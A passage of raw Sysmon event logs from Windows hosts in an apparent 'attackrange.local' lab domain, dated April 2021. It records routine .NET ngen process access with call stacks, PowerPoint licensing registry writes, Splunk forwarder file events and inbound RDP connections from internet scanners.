ET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050595Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:50.330{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B1E835AD49135D3C7A783AEC817E5D7,SHA256=690EED7906B0EFBBA5A76D9B927A401268638ED28379A7477B9A97D0738261E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050594Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:47.732{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52564-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050593Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:47.522{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52603-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000080973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.919{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-070F-00000000BB01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.903{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-070F-00000000BB01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.903{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-070F-00000000BB01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.841{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-060F-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.825{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-060F-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.825{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-060F-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000080967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:51.810{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId\PublisherO365ProPlusRetail 13241300x800000000000000080966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:51.810{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp\Publisher{3AD61E22-E4FE-497F-BDB1-3E51BD872173}, 10341000x800000000000000080965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.763{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-050F-00000000BB01}6320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:50.238{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56266-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000080963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.747{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-050F-00000000BB01}6320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.747{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-050F-00000000BB01}6320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.669{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-040F-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.653{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-040F-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.653{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-040F-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.622{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-030F-00000000BB01}5852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.606{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-030F-00000000BB01}5852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.606{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-030F-00000000BB01}5852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.560{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.513{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE4196BF37099EBD2E17E865EA46A31F,SHA256=1DB4055FA48661A54A4E3AC0A7A7CE862CBB70CF8CB4C7E988621C9857AA8F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.513{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=DE6407CE635E2449E68041955CA43137,SHA256=58D1E1901169C8F73C13BD3FEA830F786333D6957C988CF70178430EF6F14582,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.497{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-020F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.481{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2B-607E-020F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.481{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2B-607E-020F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:51.419{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2B-607E-010F-00000000BB01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 